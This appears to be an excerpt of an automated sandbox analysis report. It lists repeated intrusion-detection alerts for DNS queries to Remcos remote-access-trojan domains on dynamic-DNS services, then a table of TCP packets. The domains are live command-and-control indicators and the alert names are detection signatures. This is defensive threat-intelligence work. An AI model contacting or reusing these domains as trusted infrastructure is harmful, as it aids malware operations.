2024-11-30T21:20:51.612708+0100	2052851	ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)	1	192.168.2.4	52634	1.1.1.1	53	UDP
2024-11-30T21:20:52.775781+0100	2052849	ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)	1	192.168.2.4	53910	1.1.1.1	53	UDP
2024-11-30T21:20:56.191186+0100	2052852	ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)	1	192.168.2.4	49950	1.1.1.1	53	UDP
2024-11-30T21:20:56.331584+0100	2052851	ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)	1	192.168.2.4	65535	1.1.1.1	53	UDP
2024-11-30T21:20:57.410476+0100	2052849	ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)	1	192.168.2.4	64562	1.1.1.1	53	UDP
2024-11-30T21:21:01.336260+0100	2052852	ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)	1	192.168.2.4	51070	1.1.1.1	53	UDP
2024-11-30T21:21:01.481594+0100	2052851	ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)	1	192.168.2.4	64085	1.1.1.1	53	UDP
2024-11-30T21:21:02.425920+0100	2052849	ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)	1	192.168.2.4	52150	1.1.1.1	53	UDP
2024-11-30T21:21:06.472411+0100	2052852	ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)	1	192.168.2.4	60083	1.1.1.1	53	UDP
2024-11-30T21:21:06.610152+0100	2052851	ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)	1	192.168.2.4	51686	1.1.1.1	53	UDP
2024-11-30T21:21:07.395180+0100	2052849	ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)	1	192.168.2.4	49533	1.1.1.1	53	UDP
2024-11-30T21:21:11.300691+0100	2052852	ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)	1	192.168.2.4	55617	1.1.1.1	53	UDP
2024-11-30T21:21:11.440707+0100	2052851	ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)	1	192.168.2.4	63256	1.1.1.1	53	UDP
2024-11-30T21:21:12.097825+0100	2052849	ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)	1	192.168.2.4	53613	1.1.1.1	53	UDP
2024-11-30T21:21:16.081947+0100	2052852	ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)	1	192.168.2.4	64835	1.1.1.1	53	UDP
2024-11-30T21:21:16.223571+0100	2052851	ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)	1	192.168.2.4	55983	1.1.1.1	53	UDP
2024-11-30T21:21:17.114683+0100	2052849	ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)	1	192.168.2.4	51516	1.1.1.1	53	UDP
2024-11-30T21:21:20.911866+0100	2052852	ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)	1	192.168.2.4	51115	1.1.1.1	53	UDP
2024-11-30T21:21:21.060028+0100	2052851	ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)	1	192.168.2.4	60681	1.1.1.1	53	UDP
2024-11-30T21:21:21.925966+0100	2052849	ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)	1	192.168.2.4	52789	1.1.1.1	53	UDP
2024-11-30T21:21:26.003395+0100	2052852	ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)	1	192.168.2.4	56146	1.1.1.1	53	UDP
2024-11-30T21:21:26.142193+0100	2052851	ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)	1	192.168.2.4	53764	1.1.1.1	53	UDP
2024-11-30T21:21:26.914161+0100	2052849	ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)	1	192.168.2.4	51596	1.1.1.1	53	UDP
2024-11-30T21:21:30.894482+0100	2052852	ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)	1	192.168.2.4	50790	1.1.1.1	53	UDP
2024-11-30T21:21:31.042434+0100	2052851	ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)	1	192.168.2.4	63174	1.1.1.1	53	UDP
2024-11-30T21:21:31.894876+0100	2052849	ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)	1	192.168.2.4	53224	1.1.1.1	53	UDP
2024-11-30T21:21:35.895926+0100	2052852	ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)	1	192.168.2.4	57528	1.1.1.1	53	UDP
2024-11-30T21:21:36.037108+0100	2052851	ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)	1	192.168.2.4	65098	1.1.1.1	53	UDP
2024-11-30T21:21:36.899306+0100	2052849	ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)	1	192.168.2.4	51254	1.1.1.1	53	UDP
2024-11-30T21:21:40.893780+0100	2052852	ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)	1	192.168.2.4	56028	1.1.1.1	53	UDP
2024-11-30T21:21:41.032602+0100	2052851	ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)	1	192.168.2.4	64170	1.1.1.1	53	UDP
2024-11-30T21:21:41.897578+0100	2052849	ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)	1	192.168.2.4	56769	1.1.1.1	53	UDP
2024-11-30T21:21:45.894664+0100	2052852	ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)	1	192.168.2.4	63060	1.1.1.1	53	UDP
2024-11-30T21:21:46.033448+0100	2052851	ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)	1	192.168.2.4	58629	1.1.1.1	53	UDP
2024-11-30T21:21:46.893853+0100	2052849	ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)	1	192.168.2.4	58691	1.1.1.1	53	UDP
2024-11-30T21:21:50.893873+0100	2052851	ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)	1	192.168.2.4	51471	1.1.1.1	53	UDP
2024-11-30T21:21:51.032885+0100	2052852	ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)	1	192.168.2.4	52245	1.1.1.1	53	UDP
2024-11-30T21:21:51.893728+0100	2052849	ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)	1	192.168.2.4	58065	1.1.1.1	53	UDP
2024-11-30T21:21:55.976395+0100	2052852	ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)	1	192.168.2.4	64574	1.1.1.1	53	UDP
2024-11-30T21:21:56.174391+0100	2052851	ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)	1	192.168.2.4	62933	1.1.1.1	53	UDP
2024-11-30T21:21:56.894636+0100	2052849	ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)	1	192.168.2.4	59056	1.1.1.1	53	UDP
2024-11-30T21:22:00.894512+0100	2052852	ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)	1	192.168.2.4	63380	1.1.1.1	53	UDP
2024-11-30T21:22:01.033886+0100	2052851	ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)	1	192.168.2.4	51698	1.1.1.1	53	UDP
2024-11-30T21:22:01.894428+0100	2052849	ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)	1	192.168.2.4	63586	1.1.1.1	53	UDP
2024-11-30T21:22:05.893787+0100	2052852	ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)	1	192.168.2.4	56631	1.1.1.1	53	UDP
2024-11-30T21:22:06.033983+0100	2052851	ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)	1	192.168.2.4	63067	1.1.1.1	53	UDP
2024-11-30T21:22:06.894415+0100	2052849	ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)	1	192.168.2.4	61809	1.1.1.1	53	UDP
2024-11-30T21:22:10.893994+0100	2052852	ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)	1	192.168.2.4	60693	1.1.1.1	53	UDP
2024-11-30T21:22:11.038041+0100	2052851	ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)	1	192.168.2.4	61198	1.1.1.1	53	UDP
2024-11-30T21:22:11.907482+0100	2052849	ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)	1	192.168.2.4	63464	1.1.1.1	53	UDP
2024-11-30T21:22:16.047392+0100	2052852	ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)	1	192.168.2.4	56732	1.1.1.1	53	UDP
2024-11-30T21:22:16.186365+0100	2052851	ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)	1	192.168.2.4	63585	1.1.1.1	53	UDP
2024-11-30T21:22:16.894491+0100	2052849	ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)	1	192.168.2.4	53097	1.1.1.1	53	UDP
2024-11-30T21:22:20.894190+0100	2052852	ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)	1	192.168.2.4	52906	1.1.1.1	53	UDP
2024-11-30T21:22:21.034494+0100	2052851	ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)	1	192.168.2.4	63071	1.1.1.1	53	UDP
2024-11-30T21:22:21.894245+0100	2052849	ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)	1	192.168.2.4	64866	1.1.1.1	53	UDP
2024-11-30T21:22:25.897210+0100	2052851	ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)	1	192.168.2.4	54363	1.1.1.1	53	UDP
2024-11-30T21:22:26.039719+0100	2052852	ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)	1	192.168.2.4	58645	1.1.1.1	53	UDP
2024-11-30T21:22:26.895645+0100	2052849	ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)	1	192.168.2.4	50244	1.1.1.1	53	UDP
2024-11-30T21:22:30.893976+0100	2052851	ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)	1	192.168.2.4	52611	1.1.1.1	53	UDP
2024-11-30T21:22:31.032671+0100	2052852	ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)	1	192.168.2.4	51940	1.1.1.1	53	UDP
2024-11-30T21:22:31.896283+0100	2052849	ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)	1	192.168.2.4	54580	1.1.1.1	53	UDP
2024-11-30T21:22:35.894408+0100	2052852	ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)	1	192.168.2.4	63627	1.1.1.1	53	UDP
2024-11-30T21:22:36.033180+0100	2052851	ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)	1	192.168.2.4	51362	1.1.1.1	53	UDP
2024-11-30T21:22:36.893931+0100	2052849	ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)	1	192.168.2.4	57367	1.1.1.1	53	UDP
2024-11-30T21:22:41.044412+0100	2052852	ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)	1	192.168.2.4	54755	1.1.1.1	53	UDP
2024-11-30T21:22:41.208520+0100	2052851	ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)	1	192.168.2.4	49263	1.1.1.1	53	UDP
2024-11-30T21:22:41.894481+0100	2052849	ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)	1	192.168.2.4	58242	1.1.1.1	53	UDP
2024-11-30T21:22:45.894345+0100	2052852	ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)	1	192.168.2.4	51118	1.1.1.1	53	UDP
2024-11-30T21:22:46.032603+0100	2052851	ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)	1	192.168.2.4	64192	1.1.1.1	53	UDP
2024-11-30T21:22:46.894748+0100	2052849	ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)	1	192.168.2.4	57891	1.1.1.1	53	UDP
2024-11-30T21:22:50.894264+0100	2052852	ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)	1	192.168.2.4	52256	1.1.1.1	53	UDP
2024-11-30T21:22:51.033308+0100	2052851	ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)	1	192.168.2.4	60726	1.1.1.1	53	UDP
2024-11-30T21:22:51.174865+0100	2052851	ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)	1	192.168.2.4	60726	1.1.1.1	53	UDP
2024-11-30T21:22:51.893869+0100	2052849	ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)	1	192.168.2.4	54689	1.1.1.1	53	UDP
2024-11-30T21:22:55.893930+0100	2052852	ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)	1	192.168.2.4	49957	1.1.1.1	53	UDP
2024-11-30T21:22:56.032219+0100	2052851	ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)	1	192.168.2.4	51822	1.1.1.1	53	UDP
2024-11-30T21:22:56.894174+0100	2052849	ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)	1	192.168.2.4	56622	1.1.1.1	53	UDP
2024-11-30T21:23:00.893949+0100	2052852	ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)	1	192.168.2.4	56438	1.1.1.1	53	UDP
2024-11-30T21:23:01.039455+0100	2052851	ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)	1	192.168.2.4	51352	1.1.1.1	53	UDP
2024-11-30T21:23:02.390722+0100	2052849	ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)	1	192.168.2.4	52641	1.1.1.1	53	UDP
2024-11-30T21:23:05.900296+0100	2052852	ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)	1	192.168.2.4	56303	1.1.1.1	53	UDP
2024-11-30T21:23:06.042884+0100	2052851	ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)	1	192.168.2.4	60161	1.1.1.1	53	UDP
2024-11-30T21:23:06.894731+0100	2052849	ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)	1	192.168.2.4	49395	1.1.1.1	53	UDP
2024-11-30T21:23:10.894462+0100	2052851	ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)	1	192.168.2.4	54466	1.1.1.1	53	UDP
2024-11-30T21:23:11.033781+0100	2052852	ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)	1	192.168.2.4	49702	1.1.1.1	53	UDP
2024-11-30T21:23:11.893924+0100	2052849	ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)	1	192.168.2.4	59915	1.1.1.1	53	UDP
2024-11-30T21:23:15.893889+0100	2052852	ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)	1	192.168.2.4	50222	1.1.1.1	53	UDP
2024-11-30T21:23:16.033884+0100	2052851	ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)	1	192.168.2.4	59365	1.1.1.1	53	UDP
2024-11-30T21:23:16.174874+0100	2052851	ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)	1	192.168.2.4	59365	1.1.1.1	53	UDP
2024-11-30T21:23:16.894492+0100	2052849	ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)	1	192.168.2.4	50797	1.1.1.1	53	UDP
2024-11-30T21:23:20.912006+0100	2052852	ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)	1	192.168.2.4	53983	1.1.1.1	53	UDP
2024-11-30T21:23:21.056906+0100	2052851	ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)	1	192.168.2.4	57995	1.1.1.1	53	UDP
2024-11-30T21:23:21.894498+0100	2052849	ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)	1	192.168.2.4	50624	1.1.1.1	53	UDP
2024-11-30T21:23:25.893898+0100	2052852	ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)	1	192.168.2.4	57265	1.1.1.1	53	UDP
2024-11-30T21:23:26.032262+0100	2052851	ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)	1	192.168.2.4	54360	1.1.1.1	53	UDP
2024-11-30T21:23:26.896938+0100	2052849	ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)	1	192.168.2.4	65343	1.1.1.1	53	UDP
2024-11-30T21:23:31.042070+0100	2052852	ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)	1	192.168.2.4	50622	1.1.1.1	53	UDP
2024-11-30T21:23:31.323503+0100	2052851	ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)	1	192.168.2.4	49982	1.1.1.1	53	UDP
2024-11-30T21:23:31.897394+0100	2052849	ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)	1	192.168.2.4	49990	1.1.1.1	53	UDP
2024-11-30T21:23:35.904215+0100	2052852	ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)	1	192.168.2.4	50889	1.1.1.1	53	UDP
2024-11-30T21:23:36.042310+0100	2052851	ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)	1	192.168.2.4	63348	1.1.1.1	53	UDP
2024-11-30T21:23:36.893954+0100	2052849	ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)	1	192.168.2.4	58303	1.1.1.1	53	UDP
2024-11-30T21:23:40.894723+0100	2052852	ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)	1	192.168.2.4	63084	1.1.1.1	53	UDP
2024-11-30T21:23:41.034582+0100	2052851	ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)	1	192.168.2.4	50105	1.1.1.1	53	UDP
2024-11-30T21:23:41.894501+0100	2052849	ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)	1	192.168.2.4	51942	1.1.1.1	53	UDP
2024-11-30T21:23:45.894596+0100	2052852	ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)	1	192.168.2.4	54035	1.1.1.1	53	UDP
2024-11-30T21:23:46.033505+0100	2052851	ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)	1	192.168.2.4	53292	1.1.1.1	53	UDP
2024-11-30T21:23:46.896096+0100	2052849	ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)	1	192.168.2.4	62286	1.1.1.1	53	UDP
2024-11-30T21:23:50.933762+0100	2052852	ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)	1	192.168.2.4	63629	1.1.1.1	53	UDP
2024-11-30T21:23:51.089996+0100	2052851	ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)	1	192.168.2.4	58396	1.1.1.1	53	UDP
2024-11-30T21:23:51.894078+0100	2052849	ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)	1	192.168.2.4	62782	1.1.1.1	53	UDP
2024-11-30T21:23:55.896119+0100	2052851	ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)	1	192.168.2.4	59617	1.1.1.1	53	UDP
2024-11-30T21:23:56.039056+0100	2052852	ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)	1	192.168.2.4	61391	1.1.1.1	53	UDP
2024-11-30T21:23:56.894437+0100	2052849	ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)	1	192.168.2.4	57578	1.1.1.1	53	UDP
2024-11-30T21:24:00.894426+0100	2052852	ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)	1	192.168.2.4	61632	1.1.1.1	53	UDP
2024-11-30T21:24:01.032838+0100	2052851	ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)	1	192.168.2.4	58989	1.1.1.1	53	UDP
2024-11-30T21:24:01.175005+0100	2052851	ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)	1	192.168.2.4	58989	1.1.1.1	53	UDP
2024-11-30T21:24:01.894548+0100	2052849	ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org)	1	192.168.2.4	53101	1.1.1.1	53	UDP
2024-11-30T21:24:06.593437+0100	2052852	ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net)	1	192.168.2.4	52272	1.1.1.1	53	UDP
2024-11-30T21:24:06.733108+0100	2052851	ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org)	1	192.168.2.4	60223	1.1.1.1	53	UDP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 30, 2024 21:19:58.930798054 CET	49730	443	192.168.2.4	172.217.19.238
Nov 30, 2024 21:19:58.930838108 CET	443	49730	172.217.19.238	192.168.2.4
Nov 30, 2024 21:19:58.930931091 CET	49730	443	192.168.2.4	172.217.19.238
Nov 30, 2024 21:19:58.931008101 CET	49730	443	192.168.2.4	172.217.19.238
Nov 30, 2024 21:19:58.931078911 CET	443	49730	172.217.19.238	192.168.2.4
Nov 30, 2024 21:19:58.931174994 CET	49730	443	192.168.2.4	172.217.19.238
Nov 30, 2024 21:19:58.952853918 CET	49731	443	192.168.2.4	172.217.19.238
Nov 30, 2024 21:19:58.952903986 CET	443	49731	172.217.19.238	192.168.2.4
Nov 30, 2024 21:19:58.952979088 CET	49731	443	192.168.2.4	172.217.19.238
Nov 30, 2024 21:19:58.955936909 CET	49731	443	192.168.2.4	172.217.19.238
Nov 30, 2024 21:19:58.955951929 CET	443	49731	172.217.19.238	192.168.2.4
Nov 30, 2024 21:20:00.748431921 CET	443	49731	172.217.19.238	192.168.2.4
Nov 30, 2024 21:20:00.748532057 CET	49731	443	192.168.2.4	172.217.19.238
Nov 30, 2024 21:20:00.750094891 CET	443	49731	172.217.19.238	192.168.2.4
Nov 30, 2024 21:20:00.750170946 CET	49731	443	192.168.2.4	172.217.19.238
Nov 30, 2024 21:20:00.801956892 CET	49731	443	192.168.2.4	172.217.19.238
Nov 30, 2024 21:20:00.801975965 CET	443	49731	172.217.19.238	192.168.2.4
Nov 30, 2024 21:20:00.802244902 CET	443	49731	172.217.19.238	192.168.2.4
Nov 30, 2024 21:20:00.857204914 CET	49731	443	192.168.2.4	172.217.19.238
Nov 30, 2024 21:20:01.120726109 CET	49731	443	192.168.2.4	172.217.19.238
Nov 30, 2024 21:20:01.163338900 CET	443	49731	172.217.19.238	192.168.2.4
Nov 30, 2024 21:20:01.864701033 CET	443	49731	172.217.19.238	192.168.2.4
Nov 30, 2024 21:20:01.865684986 CET	443	49731	172.217.19.238	192.168.2.4
Nov 30, 2024 21:20:01.865745068 CET	49731	443	192.168.2.4	172.217.19.238
Nov 30, 2024 21:20:01.866313934 CET	49731	443	192.168.2.4	172.217.19.238
Nov 30, 2024 21:20:01.866328955 CET	443	49731	172.217.19.238	192.168.2.4
Nov 30, 2024 21:20:01.866347075 CET	49731	443	192.168.2.4	172.217.19.238
Nov 30, 2024 21:20:01.866352081 CET	443	49731	172.217.19.238	192.168.2.4
Nov 30, 2024 21:20:02.015588999 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:02.015619993 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:02.015703917 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:02.016077995 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:02.016089916 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:03.715584040 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:03.715665102 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:03.727098942 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:03.727108955 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:03.727324963 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:03.739484072 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:03.783343077 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:06.563880920 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:06.563998938 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:06.576303005 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:06.576378107 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:06.683942080 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:06.684117079 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:06.687936068 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:06.732322931 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:06.732336044 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:06.757172108 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:06.757325888 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:06.757337093 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:06.757354021 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:06.757396936 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:06.762739897 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:06.771729946 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:06.771801949 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:06.771809101 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:06.784022093 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:06.784094095 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:06.784101009 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:06.797702074 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:06.797775984 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:06.797782898 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:06.811469078 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:06.811526060 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:06.811532021 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:06.824968100 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:06.825018883 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:06.825026989 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:06.838944912 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:06.839023113 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:06.839030027 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:06.852875948 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:06.853041887 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:06.853048086 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:06.866247892 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:06.866302967 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:06.866308928 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:06.879857063 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:06.879920959 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:06.879926920 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:06.893717051 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:06.893775940 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:06.893783092 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:06.914736986 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:06.914798021 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:06.914803982 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:06.945380926 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:06.945453882 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:06.945462942 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:06.951822996 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:06.951869965 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:06.951893091 CET	49732	443	192.168.2.4	142.250.181.33
